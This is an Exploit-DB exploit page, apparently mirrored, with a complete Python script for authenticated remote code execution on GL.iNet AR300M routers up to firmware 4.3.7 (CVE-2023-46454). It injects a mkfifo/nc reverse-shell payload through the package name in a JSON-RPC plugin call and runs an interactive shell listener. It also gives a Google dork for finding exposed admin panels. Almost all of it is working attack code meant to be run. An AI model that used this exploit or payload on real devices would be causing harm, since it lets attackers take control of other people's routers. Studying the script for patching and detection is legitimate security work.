GL.iNet AR300M v4.3.7 Remote Code Execution – CVE-2023-46454 Exploit

  • 作者: cyberaz0r
    日期: 2024-03-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51852/
  • #!/usr/bin/env python3
    
    # Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
    # Google Dork: intitle:"GL.iNet Admin Panel"
    # Date: XX/11/2023
    # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
    # Vendor Homepage: https://www.gl-inet.com
    # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
    # Version: 4.3.7
    # Tested on: GL.iNet AR300M
    # CVE: CVE-2023-46454
    
    import socket
    import requests
    import readline
    from time import sleep
    from random import randint
    from sys import stdout, argv
    from threading import Thread
    
    # Every request below is sent with verify=False (presumably because the
    # router's admin UI uses a self-signed certificate), so urllib3's
    # InsecureRequestWarning is silenced up front. Note that this also means a
    # man-in-the-middle between operator and target would go unnoticed; the
    # auth token travels in the request body.
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    
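    def trigger_revshell(url, auth_token, payload, connect_timeout=10):
    	"""Send the injected ``plugins.get_package_info`` JSON-RPC call to ``url``.

    	``payload`` (an unquoted ``$(...)`` command substitution, built by main)
    	is spliced into the middle of the package name, "bas" + payload +
    	"e-files"; the backend presumably interpolates ``name`` unquoted into a
    	shell command, which is the CVE-2023-46454 injection point. A valid
    	session ``auth_token`` is required, i.e. this is authenticated RCE.

    	Runs in a worker thread (see main). The short sleep gives the listener
    	time to bind before the target calls back. Because the substitution
    	waits for the spawned shell to exit, the HTTP call is expected to block
    	for the whole session, so only the connect phase is bounded by
    	``connect_timeout`` (seconds); the read phase is left unbounded on purpose
    	so the request is not torn down while the shell is in use. Transport
    	errors are reported instead of dying as an unhandled thread exception.
    	"""
    	sleep(0.25)
    	data = {
    		'jsonrpc': '2.0',
    		'id': randint(1000, 9999),  # only needs to be unique per session
    		'method': 'call',
    		'params': [
    			auth_token,
    			'plugins',
    			'get_package_info',
    			{'name': 'bas{}e-files'.format(payload)},
    		],
    	}
    	try:
    		requests.post(url, json=data, verify=False, timeout=(connect_timeout, None))
    	except requests.exceptions.RequestException as e:
    		# Refused/unreachable/TLS failure: the trigger never reached the target,
    		# so the listener's 5 s wait will report "no connection" as well.
    		print('[-] RPC request failed with {}'.format(type(e).__name__))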
    
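    def get_command_response(s):
    	"""Drain whatever the shell has sent on ``s`` and return it as text.

    	Reads until the socket's timeout fires (the caller in this file sets a
    	2 s timeout, so "no output for 2 s" is taken as "command finished") or
    	until the peer closes the connection. Bytes are accumulated and decoded
    	once, so a multi-byte UTF-8 sequence split across reads is kept rather
    	than dropped, and undecodable bytes become U+FFFD instead of vanishing.

    	Args:
    		s: a connected socket with a timeout set.

    	Returns:
    		The received output as a str (empty if nothing arrived).
    	"""
    	chunks = []
    	while True:
    		try:
    			chunk = s.recv(4096)
    		except socket.timeout:
    			break
    		if not chunk:
    			# Peer closed: recv() would keep returning b'' without blocking,
    			# which used to spin forever here.
    			break
    		chunks.append(chunk)
    	return b''.join(chunks).decode('utf-8', errors='replace')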
    
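    def revshell_listen(revshell_ip, revshell_port):
    	"""Wait for the target's reverse shell and run an interactive prompt on it.

    	Binds ``revshell_ip:revshell_port``, waits up to 5 s for one inbound
    	connection, then loops: read a command from the operator, send it with a
    	trailing newline, print whatever comes back within 2 s (see
    	get_command_response). Ctrl-C or Ctrl-D ends the session.

    	Args:
    		revshell_ip: local address the target will connect back to.
    		revshell_port: local port, as int or numeric string.

    	Raises:
    		SystemExit(1) if the listener cannot be bound.
    	"""
    	with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    		# Allow an immediate re-run on the same port after a previous session
    		# left the socket in TIME_WAIT.
    		srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    		srv.settimeout(5)

    		try:
    			srv.bind((revshell_ip, int(revshell_port)))
    			srv.listen(1)
    		except (OSError, ValueError) as e:
    			print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
    			# raise SystemExit rather than the site-module exit() builtin
    			raise SystemExit(1)

    		try:
    			clsock, claddr = srv.accept()
    		except socket.timeout:
    			print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
    			return
    		except KeyboardInterrupt:
    			print('\n[*] Closing connection')
    			return

    		with clsock:
    			# Per-command read budget; get_command_response stops on this timeout.
    			clsock.settimeout(2)
    			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
    			try:
    				while True:
    					command = input('$ ')
    					clsock.sendall('{}\n'.format(command).encode('utf-8'))
    					stdout.write(get_command_response(clsock))
    					stdout.flush()
    			except (KeyboardInterrupt, EOFError):
    				# Ctrl-C or Ctrl-D at the prompt.
    				print('\n[*] Closing connection')
    			except OSError as e:
    				# Includes socket.timeout on sendall, BrokenPipeError and
    				# ConnectionResetError: the shell on the target went away.
    				print('\n[-] Reverse shell connection lost ({})'.format(type(e).__name__))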
    
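    def main(base_url, auth_token, revshell_ip, revshell_port):
    	"""Run the exploit end to end.

    	Fires the injected RPC call from a background thread and, in the
    	foreground, listens for the resulting reverse shell.

    	Args:
    		base_url: scheme + host of the target admin panel; '/rpc' is appended.
    		auth_token: a valid session token for the target's JSON-RPC API.
    		revshell_ip: address the target should connect back to.
    		revshell_port: port for the reverse shell listener.
    	"""
    	print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

    	# Classic mkfifo/nc reverse shell wrapped in an unquoted $(...) so it is
    	# evaluated where the vulnerable RPC handler interpolates the package
    	# name. Assumes the target's nc can connect outbound (true on the tested
    	# firmware, per the header).
    	payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
    	print('[+] Reverse shell payload: "{}"'.format(payload))

    	print('[*] Triggering reverse shell connection')
    	# daemon=True: the HTTP call blocks for as long as the spawned shell
    	# lives, and a non-daemon thread stuck in requests.post would keep the
    	# process alive after the listener gives up or the operator quits.
    	# rstrip('/') avoids a '//rpc' path when the URL is given with a slash.
    	Thread(
    		target=trigger_revshell,
    		args=(base_url.rstrip('/') + '/rpc', auth_token, payload),
    		daemon=True,
    	).start()

    	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
    	revshell_listen(revshell_ip, revshell_port)

    	print('[+] Done')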
    
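    if __name__ == '__main__':
    	# Exactly four positional arguments are used; extras are ignored.
    	if len(argv) < 5:
    		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
    		# SystemExit directly: the exit() builtin is a site-module convenience
    		# that is absent under `python -S`.
    		raise SystemExit(1)

    	main(*argv[1:5])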